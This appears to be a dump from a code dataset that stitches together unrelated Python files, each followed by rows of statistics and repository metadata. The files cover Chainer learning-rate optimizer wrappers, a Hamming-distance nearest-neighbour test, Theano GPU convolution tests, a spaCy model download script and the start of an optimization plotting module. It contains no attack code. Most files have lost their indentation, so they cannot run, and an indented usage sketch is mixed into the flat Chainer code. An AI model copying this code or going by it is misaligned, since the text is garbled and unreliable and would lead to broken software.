optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
self.schedule = schedule
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerGooglenetV2(Optimizer):
def __init__(self, model=None, lr=0.045, momentum=0.9, weight_decay=4.0e-5):
super(OptimizerGooglenetV2, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i % 2 == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerGooglenetV3(Optimizer):
def __init__(self, model=None, lr=0.045, decay=0.9, eps=1.0, weight_decay=4.0e-5, clip=2.0):
super(OptimizerGooglenetV3, self).__init__(model)
optimizer = optimizers.RMSprop(lr, decay, eps)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
clip = chainer.optimizer.GradientClipping(clip)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
optimizer.add_hook(clip)
self.optimizer = optimizer
def __call__(self, i):
if i % 2 == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerResNext(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, weight_decay=5.0e-4, schedule=(150, 225)):
super(OptimizerResNext, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerFractalNet(Optimizer):
def __init__(self, model=None, lr=0.02, momentum=0.9, schedule=(200, 300, 350, 375)):
super(OptimizerFractalNet, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
all_links = OptimizerFractalNet._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
optimizer.setup(link[0])
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerPyramidalResNet(Optimizer):
def __init__(self, model=None, lr=0.5, momentum=0.9, schedule=(150, 225), weight_decay=1.0e-4):
super(OptimizerPyramidalResNet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerStochasticDepth(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, schedule=(250, 375), weight_decay=1.0e-4):
super(OptimizerStochasticDepth, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
all_links = OptimizerStochasticDepth._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerResnetOfResnet(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, schedule=(250, 375), weight_decay=1.0e-4):
super(OptimizerResnetOfResnet, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
all_links = OptimizerStochasticDepth._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerPReLUNet(Optimizer):
def __init__(self, model=None, lr=0.01, momentum=0.9, schedule=(150, 225), weight_decay=5.0e-4):
super(OptimizerPReLUNet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerResnetInResnet(Optimizer):
def __init__(self, model=None, schedule=(42, 62), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerResnetInResnet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerAppendixA(Optimizer):
def __init__(self, model=None, schedule=(150, 175), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerAppendixA, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerWeightedRes(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, schedule=(int(32000. / (50000. / 128)), int(48000. / (50000. / 128))), weight_decay=1.0e-4, weight_lr=0.001):
super(OptimizerWeightedRes, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
self.weight_lr = weight_lr
all_links = OptimizerWeightedRes._find(model)
optimizer_set = []
for link in all_links:
if link[1].data.shape == (1, 1, 1, 1):
optimizer = optimizers.MomentumSGD(weight_lr, momentum)
else:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
            grad = OptimizerWeightedRes._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerWeightedRes._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
class OptimizerPyramidalResNetWithSSD(Optimizer):
def __init__(self, model=None, lr=0.5, momentum=0.9, schedule=(150, 225), weight_decay=1.0e-4):
super(OptimizerPyramidalResNetWithSSD, self).__init__(model)
self.lr = lr
self.momentum = momentum
self.schedule = schedule
self.weight_decay = weight_decay
all_links = OptimizerPyramidalResNetWithSSD._find(model)
optimizer_set = []
for link in all_links:
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(self.weight_decay)
optimizer.setup(link[0])
optimizer.add_hook(weight_decay)
optimizer_set.append(optimizer)
self.optimizer_set = optimizer_set
self.all_links = all_links
self.flag = False
def __call__(self, i):
if i in self.schedule:
for optimizer in self.optimizer_set:
lr = optimizer.lr / 10
if self.flag is False:
print('lr is changed: {} -> {}'.format(optimizer.lr, lr))
self.flag = True
optimizer.lr = lr
self.flag = False
def update(self):
for i in six.moves.range(len(self.all_links)):
if self.all_links[i][1].grad is not None:
self.optimizer_set[i].update()
@staticmethod
def _grad(ele):
if hasattr(ele, 'W') and hasattr(ele.W, 'grad'):
return (ele, ele.W)
if hasattr(ele, 'beta') and hasattr(ele.beta, 'grad'):
return (ele, ele.beta)
return None
@staticmethod
def _children(ele):
return hasattr(ele, '_children')
@staticmethod
def _find(model):
links = []
def dfs(ele):
grad = OptimizerStochasticDepth._grad(ele)
if grad is not None:
links.append(grad)
else:
if OptimizerStochasticDepth._children(ele):
for link in ele._children:
dfs(ele[link])
dfs(model)
return links
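# --- Usage sketch (not part of the original module; added for illustration) ---
# Minimal example of driving one of the schedule-based wrappers above from a
# training loop. The toy model, data, and epoch count below are assumptions;
# only the wrapper API visible in this file (construction with a model, calling
# the wrapper with the epoch index, and updating the wrapped chainer optimizer)
# is taken from the code above.
if __name__ == '__main__':
    import numpy as np
    import chainer.links as L
    import chainer.functions as F

    toy_model = L.Linear(4, 2)                       # hypothetical stand-in model
    opt = OptimizerResNext(model=toy_model, lr=0.1)  # decays lr at epochs 150 and 225
    x = np.random.rand(8, 4).astype(np.float32)
    t = np.random.randint(0, 2, size=(8,)).astype(np.int32)
    for epoch in range(3):
        opt(epoch)                                   # apply the lr schedule for this epoch
        toy_model.cleargrads()
        loss = F.softmax_cross_entropy(toy_model(x), t)
        loss.backward()
        opt.optimizer.update()                       # update the wrapped MomentumSGD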
| 34.442748
| 166
| 0.597473
| 2,660
| 22,560
| 4.883459
| 0.05188
| 0.091455
| 0.054273
| 0.041878
| 0.87806
| 0.868283
| 0.860662
| 0.845881
| 0.832871
| 0.815935
| 0
| 0.025113
| 0.293972
| 22,560
| 654
| 167
| 34.495413
| 0.790432
| 0.004167
| 0
| 0.839851
| 0
| 0
| 0.027289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126629
| false
| 0.001862
| 0.007449
| 0.009311
| 0.219739
| 0.042831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4306fae2fbd0b10867c12caf8af0831f38688c0f
| 2,884
|
py
|
Python
|
tests/algorihtm_tests/find_nearest_tests/string_data/hamming_distance_test.py
|
cenkbircanoglu/clustering
|
0a97fbf43e58e65e8d9eed30eecff00bcd47f093
|
[
"MIT"
] | 23
|
2015-01-21T01:39:11.000Z
|
2019-08-27T09:43:39.000Z
|
tests/algorihtm_tests/find_nearest_tests/string_data/hamming_distance_test.py
|
cenkbircanoglu/clustering
|
0a97fbf43e58e65e8d9eed30eecff00bcd47f093
|
[
"MIT"
] | 1
|
2015-01-18T08:52:30.000Z
|
2015-01-18T08:52:30.000Z
|
tests/algorihtm_tests/find_nearest_tests/string_data/hamming_distance_test.py
|
cenkbircanoglu/clustering
|
0a97fbf43e58e65e8d9eed30eecff00bcd47f093
|
[
"MIT"
] | 6
|
2015-03-23T16:58:18.000Z
|
2019-03-12T06:31:56.000Z
|
from unittest import TestCase
from similarityPy.algorithms.find_nearest import FindNearest
from similarityPy.measure.string_data.hamming_distance import HammingDistance
from tests import test_logger
__author__ = 'cenk'
class FindNearestTest(TestCase):
def setUp(self):
pass
def test_hamming_distance(self):
test_logger.debug("FindNearestTest - test_hamming_distance Starts")
points = ["abcdef", "abcefg", "abcdeg"]
point = "abcdef"
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcdef", nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "abcdefg"
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcXefg", nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "1234567"
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcXdef", nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "123456 "
find_nearest = FindNearest(points, point, HammingDistance)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals("abcXdef", nearest)
test_logger.debug("FindNearestTest - test_hamming_distance Ends")
def test_hamming_distance_multiple(self):
test_logger.debug("FindNearestTest - test_hamming_distance_multiple Starts")
points = ["abcdef", "abcefg", "abcdeg"]
point = "abcdef"
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcdef', 'abcdeg'], nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "abcdefg"
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcXefg', 'abcXdeg'], nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "1234567"
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcXdef', 'abcXdef'], nearest)
points = ["abcXdef", "abcXefg", "abcXdeg"]
point = "123456 "
find_nearest = FindNearest(points, point, HammingDistance, k=2)
find_nearest.process()
nearest = find_nearest.get_result()
self.assertEquals(['abcXdef', 'abcXdef'], nearest)
test_logger.debug("FindNearestTest - test_hamming_distance_multiple Ends")
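# --- Illustrative sketch (not part of the original test file) ---
# The assertions above depend only on Hamming-distance semantics: the number of
# positions at which two equal-length strings differ, with the nearest neighbour
# being the candidate at minimal distance. The helpers below restate that idea
# in plain Python for illustration; they are NOT the similarityPy implementation
# and the names `hamming_distance` and `find_nearest_string` are made up here.
def hamming_distance(a, b):
    if len(a) != len(b):
        raise ValueError('Hamming distance is defined for equal-length strings')
    return sum(1 for ca, cb in zip(a, b) if ca != cb)

def find_nearest_string(points, point):
    # min() keeps the first candidate on ties, matching the tie behaviour the
    # tests above appear to expect (e.g. "abcXdef" wins for point "1234567").
    return min(points, key=lambda p: hamming_distance(p, point))

if __name__ == '__main__':
    print(find_nearest_string(["abcdef", "abcefg", "abcdeg"], "abcdef"))      # abcdef
    print(find_nearest_string(["abcXdef", "abcXefg", "abcXdeg"], "1234567"))  # abcXdef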
| 36.506329
| 84
| 0.658114
| 283
| 2,884
| 6.498233
| 0.166078
| 0.149538
| 0.095704
| 0.121805
| 0.836324
| 0.836324
| 0.836324
| 0.836324
| 0.769984
| 0.716694
| 0
| 0.013477
| 0.228155
| 2,884
| 79
| 85
| 36.506329
| 0.812668
| 0
| 0
| 0.709677
| 0
| 0
| 0.172964
| 0.035355
| 0
| 0
| 0
| 0
| 0.129032
| 1
| 0.048387
| false
| 0.016129
| 0.064516
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4326ac5881117a1bdb7d0b1524ce7aab291874a5
| 7,322
|
py
|
Python
|
theano/gpuarray/tests/test_abstractconv.py
|
gundun/theano
|
09d17fff10487dca7149e34601b8c6efdc572a19
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gpuarray/tests/test_abstractconv.py
|
gundun/theano
|
09d17fff10487dca7149e34601b8c6efdc572a19
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gpuarray/tests/test_abstractconv.py
|
gundun/theano
|
09d17fff10487dca7149e34601b8c6efdc572a19
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, print_function, division
from nose.plugins.skip import SkipTest
import numpy
from theano.tensor.nnet.tests import test_abstract_conv
from ..type import GpuArrayType, gpuarray_shared_constructor, get_context
from ..dnn import dnn_available, GpuDnnConv, GpuDnnConvGradW, GpuDnnConvGradI
from ..blas import (
GpuCorrMM, GpuCorrMM_gradWeights, GpuCorrMM_gradInputs,
GpuCorr3dMM, GpuCorr3dMM_gradWeights, GpuCorr3dMM_gradInputs)
from .config import mode_with_gpu, test_ctx_name
from pygpu import gpuarray
gpu_ftensor4 = GpuArrayType(dtype='float32', broadcastable=(False,) * 4)
class TestDnnConv2d(test_abstract_conv.BaseTestConv2d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv2d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
        # provide_shape is not used by the cuDNN implementation
cls.provide_shape = [False]
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1)):
if not dnn_available(test_ctx_name):
raise SkipTest(dnn_available.msg)
mode = mode_with_gpu
if fd != (1, 1):
raise SkipTest("Doesn't have CUDNN implementation")
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConv)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradW)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradI)
class TestDnnConv3d(test_abstract_conv.BaseTestConv3d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv3d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
        # provide_shape is not used by the cuDNN implementation
cls.provide_shape = [False]
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1, 1)):
if not dnn_available(test_ctx_name):
raise SkipTest(dnn_available.msg)
mode = mode_with_gpu
if fd != (1, 1, 1):
raise SkipTest("Doesn't have CUDNN implementation")
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConv)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradW)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=GpuDnnConvGradI)
class TestCorrMMConv2d(test_abstract_conv.BaseTestConv2d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv2d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
cls.mode = mode_with_gpu.excluding('cudnn')
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1)):
mode = self.mode
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f,
subsample=s, verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=(GpuCorrMM,
GpuCorrMM_gradWeights,
GpuCorrMM_gradInputs),
filter_dilation=fd)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorrMM_gradWeights,
filter_dilation=fd)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorrMM_gradInputs,
filter_dilation=fd)
class TestCorrMMConv3d(test_abstract_conv.BaseTestConv3d):
@classmethod
def setup_class(cls):
test_abstract_conv.BaseTestConv3d.setup_class()
cls.shared = staticmethod(gpuarray_shared_constructor)
cls.mode = mode_with_gpu.excluding('cudnn')
def tcase(self, i, f, s, b, flip, provide_shape, fd=(1, 1, 1)):
mode = self.mode
o = self.get_output_shape(i, f, s, b, fd)
self.run_fwd(inputs_shape=i, filters_shape=f,
subsample=s, verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip, target_op=(GpuCorr3dMM,
GpuCorr3dMM_gradWeights,
GpuCorr3dMM_gradInputs),
filter_dilation=fd)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorr3dMM_gradWeights,
filter_dilation=fd)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode,
provide_shape=provide_shape, border_mode=b,
filter_flip=flip,
target_op=GpuCorr3dMM_gradInputs,
filter_dilation=fd)
class TestDnnConvTypes(test_abstract_conv.TestConvTypes):
def setUp(self):
self.input = gpu_ftensor4()
self.filters = gpu_ftensor4()
self.topgrad = gpu_ftensor4()
self.constant_tensor = gpuarray.array(
numpy.zeros((3, 5, 7, 11), dtype='float32'),
context=get_context(test_ctx_name))
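# --- Note (not part of the original test module) ---
# These classes are plain nose-style test cases: each reuses the parameter grid
# defined by test_abstract_conv.BaseTestConv2d/BaseTestConv3d and only overrides
# tcase() to pin the expected GPU op (cuDNN or the GpuCorrMM variants). A typical
# invocation, assuming a CUDA-capable build, would be something like
#     THEANO_FLAGS=device=cuda nosetests theano/gpuarray/tests/test_abstractconv.py
# but the exact flags depend on the local Theano configuration.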
| 45.7625
| 77
| 0.584813
| 805
| 7,322
| 5.040994
| 0.142857
| 0.094628
| 0.035485
| 0.056185
| 0.835633
| 0.779941
| 0.779941
| 0.779941
| 0.779941
| 0.779941
| 0
| 0.010091
| 0.336793
| 7,322
| 159
| 78
| 46.050314
| 0.825577
| 0.01434
| 0
| 0.731343
| 0
| 0
| 0.012476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067164
| false
| 0
| 0.067164
| 0
| 0.171642
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a2f82ded4f11761e4a62f3536a40ebe8d6375c7
| 177
|
py
|
Python
|
pre_requisites.py
|
vishwachintu/Resume-rater
|
61234565eb9953a4b3a71957441501b6cd008b76
|
[
"MIT"
] | null | null | null |
pre_requisites.py
|
vishwachintu/Resume-rater
|
61234565eb9953a4b3a71957441501b6cd008b76
|
[
"MIT"
] | null | null | null |
pre_requisites.py
|
vishwachintu/Resume-rater
|
61234565eb9953a4b3a71957441501b6cd008b76
|
[
"MIT"
] | null | null | null |
import os
# Install SpaCy Dependencies
os.system('python3 -m spacy download en_core_web_lg')
os.system('python3 -m spacy download en_core_web_sm')
# Install nltk Dependencies
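# --- Illustrative alternative (not part of the original script) ---
# The os.system calls above shell out to download spaCy models and ignore the
# exit status. A slightly more robust equivalent, shown only as a sketch, uses
# subprocess.check_call so a failed download raises instead of passing silently.
# import subprocess, sys
# for model_name in ('en_core_web_lg', 'en_core_web_sm'):
#     subprocess.check_call([sys.executable, '-m', 'spacy', 'download', model_name])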
| 22.125
| 53
| 0.79661
| 28
| 177
| 4.821429
| 0.535714
| 0.118519
| 0.222222
| 0.237037
| 0.562963
| 0.562963
| 0.562963
| 0.562963
| 0.562963
| 0
| 0
| 0.012903
| 0.124294
| 177
| 7
| 54
| 25.285714
| 0.858065
| 0.293785
| 0
| 0
| 0
| 0
| 0.655738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4a6f14b834ce8f74a652e76b98d54a7fdcf20734
| 22,467
|
py
|
Python
|
src/picasso/utils/data_visualization/optimization_plots.py
|
sreimond/picasso
|
89948b1707f44ca03c566da1d4424d9bc208e380
|
[
"MIT"
] | null | null | null |
src/picasso/utils/data_visualization/optimization_plots.py
|
sreimond/picasso
|
89948b1707f44ca03c566da1d4424d9bc208e380
|
[
"MIT"
] | null | null | null |
src/picasso/utils/data_visualization/optimization_plots.py
|
sreimond/picasso
|
89948b1707f44ca03c566da1d4424d9bc208e380
|
[
"MIT"
] | 1
|
2021-02-26T18:33:33.000Z
|
2021-02-26T18:33:33.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 5 10:57:10 2018
@author: sreimond
"""
import matplotlib
matplotlib.use('agg')
import sys
sys.path.insert(0,'../optimization')
import numpy as np
from copy import deepcopy
import pylab
from mpl_toolkits.mplot3d import Axes3D
import warnings
#import SOBGA, SOCGA, MOCGA, downhill_simplex
from ..optimization import SOBGA
from ..optimization import SOCGA
from ..optimization import MOCGA
from ..optimization import downhill_simplex
def plot_convergence( optimization_result ):
"""
    The `plot_convergence` function inside the optimization_plots
module visualizes the convergence of a GA result as obtained via the
optimization.SOBGA or optimization.SOCGA modules.
"""
if (isinstance(optimization_result,downhill_simplex.Simplex)):
return _plot_convergence_ds( optimization_result )
if not (isinstance(optimization_result,SOBGA.Population) or isinstance(optimization_result,SOCGA.Population)):
warnings.warn('Please use the SOBGA or SOCGA class.')
return
x = optimization_result.development['generation']
y_best = optimization_result.development['best_fitness']
y_mean = optimization_result.development['mean_fitness']
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
